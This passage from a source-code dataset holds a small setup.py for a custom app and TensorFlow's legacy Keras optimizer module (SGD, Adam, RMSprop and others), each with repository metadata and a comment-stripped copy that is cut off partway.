mbox[str(size)], num_classes)
return SSD(phase, size, base_, extras_, head_, num_classes)
| true
| true
|
1c3ead8902dc5079ac08b7790e806050bc90ad77
| 702
|
py
|
Python
|
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | null | null | null |
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | null | null | null |
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | 1
|
2019-12-31T06:52:12.000Z
|
2019-12-31T06:52:12.000Z
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import re, ast
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
# get version from __version__ variable in hunter_douglas/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('hunter_douglas/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='hunter_douglas',
version=version,
description='Custom App for Hunter Douglas',
author='VHRS',
author_email='abdulla.pi@voltechgroup.com',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
| 27
| 69
| 0.739316
|
from setuptools import setup, find_packages
import re, ast
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('hunter_douglas/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='hunter_douglas',
version=version,
description='Custom App for Hunter Douglas',
author='VHRS',
author_email='abdulla.pi@voltechgroup.com',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
| true
| true
|
1c3eae2cb9449c33d73e5d650ec292109dd9831e
| 30,227
|
py
|
Python
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 26
|
2019-11-10T15:33:34.000Z
|
2022-03-24T19:56:57.000Z
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 1
|
2019-08-15T02:49:21.000Z
|
2019-09-04T10:10:59.000Z
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 6
|
2020-03-29T11:10:53.000Z
|
2021-06-14T05:39:14.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Built-in optimizer classes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip # pylint: disable=redefined-builtin
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import ftrl
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
"""Abstract optimizer base class.
Note: this is the parent class of all optimizers, not an actual optimizer
that can be used for training models.
All Keras optimizers support the following keyword arguments:
clipnorm: float >= 0. Gradients will be clipped
when their L2 norm exceeds this value.
clipvalue: float >= 0. Gradients will be clipped
when their absolute value exceeds this value.
"""
def __init__(self, **kwargs):
allowed_kwargs = {'clipnorm', 'clipvalue'}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError('Unexpected keyword argument '
'passed to optimizer: ' + str(k))
# checks that clipnorm >= 0 and clipvalue >= 0
if kwargs[k] < 0:
raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
self.__dict__.update(kwargs)
self.updates = []
self.weights = []
def get_updates(self, loss, params):
raise NotImplementedError
def get_gradients(self, loss, params):
"""Returns gradients of `loss` with respect to `params`.
Arguments:
loss: Loss tensor.
params: List of variables.
Returns:
List of gradient tensors.
Raises:
ValueError: In case any gradient cannot be computed (e.g. if gradient
function not implemented).
"""
grads = K.gradients(loss, params)
if None in grads:
raise ValueError('An operation has `None` for gradient. '
'Please make sure that all of your ops have a '
'gradient defined (i.e. are differentiable). '
'Common ops without gradient: '
'K.argmax, K.round, K.eval.')
if hasattr(self, 'clipnorm'):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, 'clipvalue'):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def set_weights(self, weights):
"""Sets the weights of the optimizer, from Numpy arrays.
Should only be called after computing the gradients
(otherwise the optimizer has no weights).
Arguments:
weights: a list of Numpy arrays. The number of arrays and their shape
must match number of the dimensions of the weights of the optimizer
(i.e. it should match the output of `get_weights`).
Raises:
ValueError: in case of incompatible weight shapes.
"""
params = self.weights
if len(params) != len(weights):
raise ValueError('Length of the specified weight list (' +
str(len(weights)) +
') does not match the number of weights '
'of the optimizer (' + str(len(params)) + ')')
weight_value_tuples = []
param_values = K.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError('Optimizer weight shape ' + str(pv.shape) +
' not compatible with '
'provided weight shape ' + str(w.shape))
weight_value_tuples.append((p, w))
K.batch_set_value(weight_value_tuples)
def get_weights(self):
"""Returns the current value of the weights of the optimizer.
Returns:
A list of numpy arrays.
"""
return K.batch_get_value(self.weights)
def get_config(self):
config = {}
if hasattr(self, 'clipnorm'):
config['clipnorm'] = self.clipnorm
if hasattr(self, 'clipvalue'):
config['clipvalue'] = self.clipvalue
return config
@classmethod
def from_config(cls, config):
return cls(**config)
class SGD(Optimizer):
"""Stochastic gradient descent optimizer.
Includes support for momentum,
learning rate decay, and Nesterov momentum.
Arguments:
lr: float >= 0. Learning rate.
momentum: float >= 0. Parameter that accelerates SGD in the relevant
direction and dampens oscillations.
decay: float >= 0. Learning rate decay over each update.
nesterov: boolean. Whether to apply Nesterov momentum.
"""
def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
super(SGD, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.momentum = K.variable(momentum, name='momentum')
self.decay = K.variable(decay, name='decay')
self.initial_decay = decay
self.nesterov = nesterov
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
# momentum
shapes = [K.int_shape(p) for p in params]
moments = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + moments
for p, g, m in zip(params, grads, moments):
v = self.momentum * m - lr * g # velocity
self.updates.append(state_ops.assign(m, v))
if self.nesterov:
new_p = p + self.momentum * v - lr * g
else:
new_p = p + v
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'momentum': float(K.get_value(self.momentum)),
'decay': float(K.get_value(self.decay)),
'nesterov': self.nesterov
}
base_config = super(SGD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class RMSprop(Optimizer):
"""RMSProp optimizer.
It is recommended to leave the parameters of this optimizer
at their default values
(except the learning rate, which can be freely tuned).
Arguments:
lr: float >= 0. Learning rate.
rho: float >= 0.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
super(RMSprop, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.rho = K.variable(rho, name='rho')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': float(K.get_value(self.rho)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(RMSprop, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
"""Adagrad optimizer.
Adagrad is an optimizer with parameter-specific learning rates,
which are adapted relative to how frequently a parameter gets
updated during training. The more updates a parameter receives,
the smaller the updates.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate.
epsilon: float >= 0. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
# References
- [Adaptive Subgradient Methods for Online Learning and Stochastic
Optimization](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf)
"""
def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
super(Adagrad, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = a + math_ops.square(g) # update accumulator
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adagrad, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
"""Adadelta optimizer.
Adadelta is a more robust extension of Adagrad
that adapts learning rates based on a moving window of gradient updates,
instead of accumulating all past gradients. This way, Adadelta continues
learning even when many updates have been done. Compared to Adagrad, in the
original version of Adadelta you don't have to set an initial learning
rate. In this version, initial learning rate and decay factor can
be set, as in most other Keras optimizers.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate, defaults to 1.
It is recommended to leave it at the default value.
rho: float >= 0. Adadelta decay factor, corresponding to fraction of
gradient to keep at each time step.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Initial learning rate decay.
# References
- [Adadelta - an adaptive learning rate
method](http://arxiv.org/abs/1212.5701)
"""
def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
super(Adadelta, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.rho = rho
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
delta_accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators + delta_accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
# use the new accumulator and the *old* delta_accumulator
update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
new_p = p - lr * update
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
# update delta_accumulator
new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
self.updates.append(state_ops.assign(d_a, new_d_a))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': self.rho,
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adadelta, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
"""Adam optimizer.
Default parameters follow those provided in the original paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1: float, 0 < beta < 1. Generally close to 1.
beta_2: float, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
amsgrad: boolean. Whether to apply the AMSGrad variant of this algorithm
from the paper "On the Convergence of Adam and Beyond".
"""
def __init__(self,
lr=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
amsgrad=False,
**kwargs):
super(Adam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
self.amsgrad = amsgrad
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr * (
K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
(1. - math_ops.pow(self.beta_1, t)))
ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
if self.amsgrad:
vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
else:
vhats = [K.zeros(1) for _ in params]
self.weights = [self.iterations] + ms + vs + vhats
for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
if self.amsgrad:
vhat_t = math_ops.maximum(vhat, v_t)
p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
self.updates.append(state_ops.assign(vhat, vhat_t))
else:
p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon,
'amsgrad': self.amsgrad
}
base_config = super(Adam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adamax(Optimizer):
"""Adamax optimizer from Adam paper's Section 7.
It is a variant of Adam based on the infinity norm.
Default parameters follow those provided in the paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
**kwargs):
super(Adamax, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
shapes = [K.int_shape(p) for p in params]
# zero init of 1st moment
ms = [K.zeros(shape) for shape in shapes]
# zero init of exponentially weighted infinity norm
us = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + ms + us
for p, g, m, u in zip(params, grads, ms, us):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
p_t = p - lr_t * m_t / (u_t + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(u, u_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adamax, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
"""Nesterov Adam optimizer.
Much like Adam is essentially RMSprop with momentum,
Nadam is Adam RMSprop with Nesterov momentum.
Default parameters follow those provided in the paper.
It is recommended to leave the parameters of this optimizer
at their default values.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
schedule_decay=0.004,
**kwargs):
super(Nadam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.m_schedule = K.variable(1., name='m_schedule')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.schedule_decay = schedule_decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
# Due to the recommendations in [2], i.e. warming momentum schedule
momentum_cache_t = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
momentum_cache_t_1 = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
m_schedule_new = self.m_schedule * momentum_cache_t
m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
self.updates.append((self.m_schedule, m_schedule_new))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
vs = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations, self.m_schedule] + ms + vs
for p, g, m, v in zip(params, grads, ms, vs):
# the following equations given in [1]
g_prime = g / (1. - m_schedule_new)
m_t = self.beta_1 * m + (1. - self.beta_1) * g
m_t_prime = m_t / (1. - m_schedule_next)
v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
m_t_bar = (1. -
momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'epsilon': self.epsilon,
'schedule_decay': self.schedule_decay
}
base_config = super(Nadam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, trackable.Trackable):
"""Wrapper class for native TensorFlow optimizers."""
def __init__(self, optimizer, iterations=None): # pylint: disable=super-init-not-called
self.optimizer = optimizer
self._track_trackable(optimizer, name='optimizer')
if iterations is None:
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
else:
self.iterations = iterations
self._track_trackable(self.iterations, name='global_step')
def apply_gradients(self, grads):
self.optimizer.apply_gradients(grads, global_step=self.iterations)
def get_grads(self, loss, params):
return self.optimizer.compute_gradients(loss, params)
def get_updates(self, loss, params):
if distribution_strategy_context.has_strategy():
self.updates = []
if not params:
# After the model vars have been created, the second call to get_updates
# is called with params as an empty list. This ensures that we call
# compute_gradients with params=None.
grads = self.optimizer.compute_gradients(loss)
else:
grads = self.optimizer.compute_gradients(loss, params)
global_step = training_util.get_global_step()
opt_update = self.optimizer.apply_gradients(grads, global_step)
else:
if not params:
self.updates = [state_ops.assign_add(self.iterations, 1)]
return self.updates
# Updates list starts out empty because the iterations variable is
# incremented in optimizer.apply_gradients()
self.updates = []
grads = self.optimizer.compute_gradients(loss, params)
opt_update = self.optimizer.apply_gradients(
grads, global_step=self.iterations)
self.updates.append(opt_update)
return self.updates
@property
def weights(self):
raise NotImplementedError
def get_config(self):
raise NotImplementedError
def from_config(self, config):
raise NotImplementedError
# Aliases.
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
"""Inverse of the `serialize` function.
Arguments:
config: Optimizer configuration dictionary.
custom_objects: Optional dictionary mapping names (strings) to custom
objects (classes and functions) to be considered during deserialization.
Returns:
A Keras Optimizer instance.
"""
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer # pylint: disable=g-import-not-at-top
all_classes = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD,
'ftrl': ftrl.Ftrl,
'lossscaleoptimizer': loss_scale_optimizer.LossScaleOptimizer,
}
# Make deserialization case-insensitive for built-in optimizers.
if config['class_name'].lower() in all_classes:
config['class_name'] = config['class_name'].lower()
return deserialize_keras_object(
config,
module_objects=all_classes,
custom_objects=custom_objects,
printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
"""Retrieves a Keras Optimizer instance.
Arguments:
identifier: Optimizer identifier, one of
- String: name of an optimizer
- Dictionary: configuration dictionary. - Keras Optimizer instance (it
will be returned unchanged). - TensorFlow Optimizer instance (it
will be wrapped as a Keras Optimizer).
Returns:
A Keras Optimizer instance.
Raises:
ValueError: If `identifier` cannot be interpreted.
"""
if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
return identifier
# Wrap TF optimizer instances
elif isinstance(identifier, tf_optimizer_module.Optimizer):
opt = TFOptimizer(identifier)
K.track_tf_optimizer(opt)
return opt
elif isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
else:
raise ValueError('Could not interpret optimizer identifier:', identifier)
| 35.519389
| 126
| 0.656069
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import ftrl
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
def __init__(self, **kwargs):
allowed_kwargs = {'clipnorm', 'clipvalue'}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError('Unexpected keyword argument '
'passed to optimizer: ' + str(k))
if kwargs[k] < 0:
raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
self.__dict__.update(kwargs)
self.updates = []
self.weights = []
def get_updates(self, loss, params):
raise NotImplementedError
def get_gradients(self, loss, params):
grads = K.gradients(loss, params)
if None in grads:
raise ValueError('An operation has `None` for gradient. '
'Please make sure that all of your ops have a '
'gradient defined (i.e. are differentiable). '
'Common ops without gradient: '
'K.argmax, K.round, K.eval.')
if hasattr(self, 'clipnorm'):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, 'clipvalue'):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def set_weights(self, weights):
params = self.weights
if len(params) != len(weights):
raise ValueError('Length of the specified weight list (' +
str(len(weights)) +
') does not match the number of weights '
'of the optimizer (' + str(len(params)) + ')')
weight_value_tuples = []
param_values = K.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError('Optimizer weight shape ' + str(pv.shape) +
' not compatible with '
'provided weight shape ' + str(w.shape))
weight_value_tuples.append((p, w))
K.batch_set_value(weight_value_tuples)
def get_weights(self):
return K.batch_get_value(self.weights)
def get_config(self):
config = {}
if hasattr(self, 'clipnorm'):
config['clipnorm'] = self.clipnorm
if hasattr(self, 'clipvalue'):
config['clipvalue'] = self.clipvalue
return config
@classmethod
def from_config(cls, config):
return cls(**config)
class SGD(Optimizer):
def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
super(SGD, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.momentum = K.variable(momentum, name='momentum')
self.decay = K.variable(decay, name='decay')
self.initial_decay = decay
self.nesterov = nesterov
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
shapes = [K.int_shape(p) for p in params]
